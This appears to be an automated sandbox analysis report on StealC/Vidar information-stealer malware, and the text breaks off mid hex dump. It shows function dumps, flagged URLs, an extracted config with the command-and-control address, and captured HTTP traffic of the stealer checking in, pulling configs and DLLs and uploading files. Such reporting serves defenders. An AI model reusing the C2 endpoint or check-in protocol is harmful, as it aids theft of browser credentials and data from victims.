Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 5a60d48d16d1ab937b47b2e409680edacacfc94582675b88803b9ff0c962a62c
Instruction ID: ad7b1a1fa9a70014ad1bb280149eecb30d461ee63199ed05e6c1abb83a498641
Opcode Fuzzy Hash: 5a60d48d16d1ab937b47b2e409680edacacfc94582675b88803b9ff0c962a62c
Instruction Fuzzy Hash: 48516674610641CFD705CF18C284A5ABBF1BF4A318F1AC18AD8596BB62C335EC85CF96

Function 6C5BBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C5BBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5BBE8F

Strings

0, xrefs: 6C5BBE5B

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: e03a98983cb3171ba18e4a007d19cbbfd92a5764d2434454ef75a5fd6cddaf63
Instruction ID: 4ef96c1d3b5b9392415a86c278844b5b0c6f31b301203f5ad9e34079708ba01a
Opcode Fuzzy Hash: e03a98983cb3171ba18e4a007d19cbbfd92a5764d2434454ef75a5fd6cddaf63
Instruction Fuzzy Hash: D441C171909745CFC701DF38C8D1A9BBBF4AF8A348F004A1DF985A7621D7B0D9498B82

Function 6C5F3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5F3D19
mozalloc_abort.MOZGLUE(?), ref: 6C5F3D6C

Strings

d, xrefs: 6C5F3D58

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 44643124a3b4e1ca5b9c7b2dad232a711158845c2fcc2d7f5a0bb8c1270bfd85
Instruction ID: 42e4032e8af22a234eec66cea40d31eeae8935ee944a0658a33bacd33950061e
Opcode Fuzzy Hash: 44643124a3b4e1ca5b9c7b2dad232a711158845c2fcc2d7f5a0bb8c1270bfd85
Instruction Fuzzy Hash: 13110431E04688D7EF048F6ACC544EDB775EFCA358F449218DC599B602EB30A985CBA5

Function 6C616DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C616E22
__Init_thread_footer.LIBCMT ref: 6C616E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C616E1D

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 60d9caa075df0aa4adf18c04f3b56f9d46490260ee5ac9283fe6311b535693c6
Instruction ID: cef8a971b90b6f9b480a4bbb9b2225378850727c882c6f721e6da69f6af37c77
Opcode Fuzzy Hash: 60d9caa075df0aa4adf18c04f3b56f9d46490260ee5ac9283fe6311b535693c6
Instruction Fuzzy Hash: 06F0F03970C240CBDB209B6DCC90E913B71D343319F0422A6C40986F71CB21E907CA9F

Function 6C5C6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0K_l,?,6C5F4B30,80000000,?,6C5F4AB7,?,6C5B43CF,?,6C5B42D2), ref: 6C5C6C42

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

moz_xmalloc.MOZGLUE(0K_l,?,6C5F4B30,80000000,?,6C5F4AB7,?,6C5B43CF,?,6C5B42D2), ref: 6C5C6C58

Strings

0K_l, xrefs: 6C5C6C33, 6C5C6C41, 6C5C6C57

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0K_l
API String ID: 1967447596-3565627764
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: fc88296fb8be8af43579999697f1d54bb9d7ee5b534b7bdb53f0136fe91eaf53
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 38E086F1B107058ADB08D9F99C0E57A71C8CB742A87044A3DE822D6BC8FF54EA518153

Function 6C60B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C60B2C9,?,?,?,6C60B127,?,?,?,?,?,?,?,?,?,6C60AE52), ref: 6C60B628

Part of subcall function 6C6090E0: free.MOZGLUE(?,00000000,?,?,6C60DEDB), ref: 6C6090FF
Part of subcall function 6C6090E0: free.MOZGLUE(?,00000000,?,?,6C60DEDB), ref: 6C609108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C60B2C9,?,?,?,6C60B127,?,?,?,?,?,?,?,?,?,6C60AE52), ref: 6C60B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C60B2C9,?,?,?,6C60B127,?,?,?,?,?,?,?,?,?,6C60AE52), ref: 6C60B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C60B127,?,?,?,?,?,?,?,?), ref: 6C60B74D

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 6f5233b01d02e81ea972567690fc9dc1533bd39600877ead003cfe3b05a7e1e3
Instruction ID: 6a36a5363c6ab1000e6976a5e98d448ae660273d65c13168db7299dba51d1190
Opcode Fuzzy Hash: 6f5233b01d02e81ea972567690fc9dc1533bd39600877ead003cfe3b05a7e1e3
Instruction Fuzzy Hash: F851DD71B012168FDB18CF18CA806AEB7B1FF85309F05C52DD85ABB700DB31A804CBA9

Function 6C61B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C5C0A4D), ref: 6C61B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C5C0A4D), ref: 6C61B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C5C0A4D), ref: 6C61B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C5C0A4D), ref: 6C61B67F

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 59ba421d61aaf0a59b5639e8a2116bc891346f1db02b709fbdfbb89a52c3091d
Instruction ID: f4183b40c611a6d52a7214db17e56b5d43f52f2e613d218137c1aac9f3973277
Opcode Fuzzy Hash: 59ba421d61aaf0a59b5639e8a2116bc891346f1db02b709fbdfbb89a52c3091d
Instruction Fuzzy Hash: B831F4B1A042268FDB10CF5DC88465ABBB5FFC1305F168669D80A9BB01EB31E915CBE4

Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll8	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpq	Avira URL Cloud: Label: malware
Source: Http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpr	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php~	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpx	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllw	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dllf	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpj	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpM	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpdll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/#	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpV	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dllz	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpe950	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php1	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php&	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll.	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.250000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.250000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00259B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00259B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0025C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00257240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00257240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00259AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00259AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00268EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00268EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C5C6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 185.215.113.37Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 45 41 35 36 44 33 39 45 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="hwid"66EA56D39EC058492808------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="build"save------KEHDBAEGIIIEBGCAAFHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="message"browsers------AFCFHJJECAEHJJKEHIDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKEHJDHJKFIECAAKFIHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="message"plugins------IJKKEHJDHJKFIECAAKFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGHHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 2d 2d 0d 0a Data Ascii: ------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------DHJDAFIEHIEGDHIDGDGHContent-Disposition: form-data; name="message"fplugins------DHJDAFIEHIEGDHIDGDGH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 5467Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="file"------DGHCBAAEHCFIDGDHJEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 